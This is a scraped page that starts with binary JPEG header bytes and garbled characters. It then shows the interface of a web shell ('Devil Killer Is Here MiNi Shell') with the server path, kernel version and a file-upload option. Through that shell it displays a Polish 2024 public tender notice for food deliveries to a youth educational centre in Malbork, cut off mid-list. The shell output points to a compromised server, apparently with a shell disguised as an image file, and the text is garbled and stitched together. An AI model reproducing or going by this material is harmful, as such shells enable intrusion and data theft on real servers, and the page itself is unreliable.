JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240521/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240521/0033266101-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa artykułów żywnościowych do internatu Młodzieżowego Ośrodka Wychowawczego Nr 1 w Malborku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MŁODZIEŻOWY OŚRODEK WYCHOWAWCZY NR 1 IM. TADEUSZA KOŚCIUSZKI W MALBORKU</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">MOW</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000205618</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Jagiellońska 94</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Malbork</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">82-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL638 - Starogardzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">552723037 w. 12</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">mow@mowmalbork.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mowmalbork.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa artykułów żywnościowych do internatu Młodzieżowego Ośrodka Wychowawczego Nr 1 w Malborku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-813c92f2-1739-11ef-bfd3-e6cc5d6d04e5</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00332661</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-05-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00097060/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa artykułów żywnościowych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-813c92f2-1739-11ef-bfd3-e6cc5d6d04e5 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja między <br/> Zamawiającym a Wykonawcami odbywa się drogą elektroniczną przy <br/> użyciu •platformy e-Zamówienia https://ezamowienia.gov.pl<br/> 2. Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/> 3. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu ,,Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce ,,Centrum Pomocy”. <br/> 4. Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce ,, Formularze” (,,Formularze do komunikacji”).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu ,,Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce ,,Centrum Pomocy”. <br/>Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania.<br/>Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce ,, Formularze” (,,Formularze do komunikacji”). Za pośrednictwem ,,Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk ,,dodaj załącznik”). W przypadku załączników, które są zgodne z ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, mogą być opatrzone, zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia, podpisem zewnętrznym lub wewnętrznym. W zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) dodaje się do przesyłanej wiadomości uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ zewnętrzny).<br/>Możliwość korzystania w postępowaniu z ,,Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta ,,Wykonawcy” na Platformie e-zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z ,,Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na platformie e-Zamówienia. <br/>Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce ,,Komunikacja”.<br/>Maksymalny rozmiar plików przesłanych za pośrednictwem ,,Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza).<br/>Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (32) 77 88 999 lub drogą elektroniczną poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce ,,Zgłoś problem”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 <br/> w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego <br/> przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) <br/> (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuje się, że: <br/> • administratorem Pani/Pana danych osobowych jest Dyrektor Młodzieżowego Ośrodka Wychowawczego Nr 1 w <br/> Malborku, ul. Jagiellońska 94, 82-200 Malbork;<br/> • dane kontaktowe Inspektora Ochrony Danych Osobowych: e-mail: iod@mainsoft.pl<br/> • Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z <br/> postępowaniem o udzielenie zamówienia publicznego na „Dostawę artykułów żywnościowych do internatu <br/> Młodzieżowego Ośrodka Wychowawczego Nr 1 w Malborku” prowadzonym w trybie przetargu podstawowego;<br/> • odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie <br/> dokumentacja postępowania w oparciu o art. 18 ust. 1 oraz art. 72 ust. 1 ustawy z dnia 11 września 2019r. Prawo <br/> zamówień publicznych, zw. dalej ustawą Pzp ,<br/> • Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia <br/> zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres <br/> przechowywania obejmuje cały czas trwania umowy;<br/> • obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem <br/> ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie <br/> zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/> • w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, <br/> stosowanie do art. 22 RODO;<br/> • posiada Pani/Pan:<br/> − na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/> − na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ;<br/> − na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z <br/> zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ; <br/> − prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że <br/> przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/> • nie przysługuje Pani/Panu:<br/> − w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/> − prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/> − na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną <br/> przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-MOW/D/1/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">8</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> PAKIET NR 1 MIĘSO ŚWIEŻE, WĘDLINY, DRÓB<br/>1	filet z kurczaka kg	220<br/>2	kurczak	duże sztuki	kg	80<br/>3	udka kurczaka	duże sztuki	kg	160<br/>4	mięso wieprzowe b/k	karkówka	kg	110<br/>5	mięso wieprzowe b/k	łopatka	kg	330<br/>6	mięso wieprzowe b/k	schab	kg	168<br/>7	pasztet luksusowy	w naturalnej osłonie	kg	20<br/>8	wątroba	wieprzowa	kg	20<br/>9	wątróbka	drobiowa	kg	20<br/>10	polędwica sopocka	wieprzowa	kg	100<br/>11	szynka gotowana wieprzowa	kg	40<br/>12	parówki z szynki	wieprzowe	kg	80<br/>13	kiełbasa z warzywami	wieprzowa	kg	48<br/>14	kiełbasa w laskach	typu ŚLĄSKA	kg	60<br/>15	kiełbasa biała	wieprzowa surowa	kg	8<br/>16	pieczeń	wieprzowa kg	40<br/>17	kiełbasa sucha krakowska	drobiowa/wieprzowa	kg	100<br/>18	schab pieczony kg	40<br/>19	kiełbasa krakowska wieprzowa	parzona/podsuszana	kg	80<br/>20	kiełbasa wieprzowa żywiecka	kg	120<br/>21	boczek wędzony kg	24<br/>22	polędwica drobiowa	kg	80<br/>23	kaszanka	kasza pęczak	kg	12<br/>24	szynka wędzona wieprzowa	kg	56 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15100000-9 - Produkty zwierzęce, mięso i produkty mięsne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta zawierająca najniższą cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> PAKIET NR 2 WYROBY PIEKARSKIE<br/>1.	chleb cały	zwykły 0,5 kg	szt.	5500<br/>2.	chleb razowy	ze słonecznikiem 0,5 kg	szt.	600<br/>3.	bułka pszenna	zwykła 0,05 kg	szt.	12000<br/>4.	bułka tarta	opakowanie 1 kg	kg	96<br/>5	bułka pełnoziarnista szt.	1600<br/>6	bułka maślana szt.	200<br/>7	rogal z makiem szt.	400<br/>8	drożdżówka	nie z ciasta głęboko mrożonego	szt.	200<br/>9	ciasto	jabłecznik	kg	5<br/>10	ciasto	rolada z kremem	kg	5<br/>11	ciasto	babka piaskowa	kg	5<br/>12	ciasto	makowiec - blacha	kg	5<br/>13	ciasto	makowiec zawijany	kg	5<br/>14	ciasto	sernik	kg	5<br/>15	drożdże piekarskie kg 2 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15810000-9 - Pieczywo, świeże wyroby piekarskie i ciastkarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta zawierająca najniższą cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> PAKIET NR 3 RYBY<br/>1.	filet płaty mintaja	max. do 5% glazury	kg	60<br/>2.	filet płaty panga	max. do 5% glazury	kg	37<br/>3.	śledzie solone	matias wiaderko 4 kg	kg	60<br/>4.	Karp	świeży	kg	5<br/>5	filet sola	max. do 30% glazury	kg	35<br/>6	filet dorsza	max. do 5% glazury	kg	16<br/>7	tuńczyk opakowanie 1 kg kg	8<br/>8	makrela wędzona	opakowanie karton 8 kg	kg	40<br/>9	filet płaty miruna	max. do 5% glazury	kg	20 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15220000-6 - Ryby mrożone, filety rybne i pozostałe mięso ryb</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta zawierająca najniższą cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> PAKIET NR 4 JAJA<br/>1	jaja świeże od 55g do 60g	średnie	szt.	6 600 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03142500-3 - Jaja</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta zawierająca najniższą cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> PAKIET NR 5 MROŻONE ARTYKUŁY SPOŻYWCZE<br/>1.	fasolka szparagowa	cięta opakowanie	kg	80<br/>2.	mieszanka warzywna	6 składników	kg	32<br/>3.	truskawka mrożona	opakowanie 2,5 kg	kg	80<br/>4.	wiśnia mrożona	opakowanie 10 kg	kg	40<br/>5.	pierogi ruskie	180g	kg	40<br/>6.	pierogi mrożone z mięsem	opakowanie 8 kg	kg	40<br/>7	pyzy z mięsem	luz	kg	40<br/>8	brokuł	opakowanie 2,5 kg	kg	24<br/>9	szpinak	opakowanie 2,5 kg	kg	8<br/>10	pyzy ziemniaczane	opakowanie 2,5 kg	kg	40<br/>11	kalafior	opakowanie 2,5 kg	kg	40<br/>12	groszek zielony	opakowanie 2,5 kg	kg	24<br/>13	mieszanka kompotowa	3 składnikowa	kg	320<br/>14	mieszanka warzywna	3 skład.(typu królewska)	kg	